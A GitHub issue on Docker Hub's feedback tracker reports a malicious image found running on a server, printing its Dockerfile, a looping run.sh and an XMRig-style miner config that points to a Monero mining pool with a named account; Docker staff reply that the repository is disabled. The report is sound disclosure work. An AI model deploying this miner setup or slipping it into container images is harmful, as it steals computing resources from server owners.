search

docker / hub-feedback

Feedback and bug reports for the Docker Hub
https://hub.docker.com
232 stars 40 forks source link

Malicious image in docker hub #1570

Closed fangbo947705 closed 6 years ago

fangbo947705 commented 6 years ago

Malicious image found in the account https://hub.docker.com/r/l0se3/dah/ in the docker hub. I recently found on a server a container with this image l0se3/dah

Dockerfile image FROM phusion/baseimage:latest LABEL maintainer=ziw RUN apt-get -y update && \ DEBIAN_FRONTEND=noninteractive apt-get install -y \ wget \ xz-utils \ git \ curl \ zip && \ rm -rf /var/lib/apt/lists/ WORKDIR /tmp RUN git clone https://github.com/l0se3x/dah.git WORKDIR /tmp/runandrun RUN unzip var.zip RUN chmod +x RUN chmod +x run.sh Run container $ docker run -it --network=none l0s3r/m3n /bin/bash

Files in WORKDIR config.json Dockerfile nodjs run.sh var.zip Contents of the files

run.sh

!/bin/sh

while : do echo "Press [CTRL+C] to stop.." ./nodjs -c config.json done config.json { "algo": "cryptonight", // cryptonight (default) or cryptonight-lite "av": 0, // algorithm variation, 0 auto select "background": false, // true to run the miner in the background "colors": true, // false to disable colored output "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest) "donate-level": 0, // donate level, mininum 1% "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log" "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. "print-time": 60, // print hashrate report every N seconds "retries": 5, // number of times to retry before switch to backup server "retry-pause": 5, // time to pause between retries "safe": false, // true to safe adjust threads and av settings for current CPU "syslog": false, // use system log for output messages "threads": 0, // number of miner threads "pools": [ { "url": "xmr.pool.minergate.com:45700", // URL of mining server "user": "sam05@protonmail.com", // username for mining server "pass": "x", // password for mining server "keepalive": true, // send keepalived for prevent timeout (need pool support) "nicehash": false, // enable nicehash/xmrig-proxy support "variant": -1 // algorithm PoW variant } ], "api": { "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API "access-token": null, // access token for API "worker-id": null // custom worker-id for API } }

manishtomar commented 6 years ago

Thanks for the report. We've disabled that repository.